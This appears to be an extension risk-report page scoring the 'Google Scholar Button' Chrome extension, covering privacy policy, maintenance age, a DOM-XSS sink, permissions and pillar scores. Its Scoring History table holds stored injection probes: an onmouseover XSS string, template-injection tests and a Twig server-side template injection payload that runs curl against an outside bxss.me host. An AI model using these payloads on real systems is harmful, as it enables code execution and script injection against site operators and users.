Google Scholar Button
ldipcbpaocekfooobnbcddclnhejkcpn
Risk Score
3.20
Risk Level:
Low
Recommendation:
🟢 LOW RISK — review
Top Risks
- Privacy policy is Google's generic corporate policy (policies.google.com) — scope_extension==false, data_collection==true, third_party_sharing==true: triggers +10.0 privacy under v3.5 rule D.
- Extension not updated in 25 months — stale but still widely deployed to 3M users.
- innerHTML DOM-XSS sink in popup-compiled.js; no CSP present to mitigate.
- v3.5 invariant 0c applies: verified-publisher discount capped at -1.0 due to months_since_update > 18.
- MV3 with no CSP: no +2.0 network penalty (MV3 exempt), but DOM sink risk elevated by csp_present==false.
Evidence
- developer_identity store Email scholar-chrome-extensions@google.com; brand_mention.confirmed_owner=true; is_impersonation=false; recognized Google org.
- privacy_policy_generic api policies.google.com policy: fetched=true, scope_extension=false, data_collection=true, third_party_sharing=true → +10.0 privacy (rule D).
- maintenance_stale store Last updated May 2024; 25 months since update → +6.0 maintenance. Invariant 0c caps org discount to -1.0.
- dom_xss_sink crx popup-compiled.js: innerHTML assigned from variable with no CSP; obfuscation_score=0.0; no eval/fetch findings.
- host_permissions_narrow manifest host_permissions limited to *://scholar.google.com/ — single first-party domain, minimal reach.
- featured_by_google store is_featured_by_google=true; -2.0 reputation discount applied (featured badge).
- no_bad_hosts api threat_intel: bad_host_hits=[], affiliate_hits=[], monetization_hits=[], looks_throwaway=false.
- cve_clean crx cve_findings_raw=[]; js_libraries_detected=[]; CVE pillar=0.0.
Permissions Breakdown
- storage low Local preference storage; low exfil risk in isolation.
- activeTab low Scoped to user-initiated action on current tab only.
- scripting medium Allows JS injection into pages; paired with narrow host_permissions limits blast radius.
- *://scholar.google.com/ (host) low Single first-party Google domain; narrow and matches stated function.
Pillar Scores
Permissions1.30
Reputation2.00
Network0.00
Webstore1.50
Maintenance6.00
Privacy10.00
Code Quality2.00
CVE Exposure0.00
Scoring History
| %F6"onmouseover=7AoP(90105)// | 4.14 | Medium | review | 2026-08-05 |
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> | 4.39 | Medium | review | 2026-08-05 |
| <th:t="${dfb}#foreach | 4.11 | Medium | review | 2026-08-05 |
| v3.6&n979231=v991361 | 4.07 | Medium | review | 2026-08-05 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitccydwrzvdj20290.bxss.me")}} | 3.38 | Low | review | 2026-07-29 |
| v3.6 | 3.20 | Low | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:51
Listing SHA
d6104a2cacee…
Force block
— not fired
Score recovered
no
Elapsed
24.6s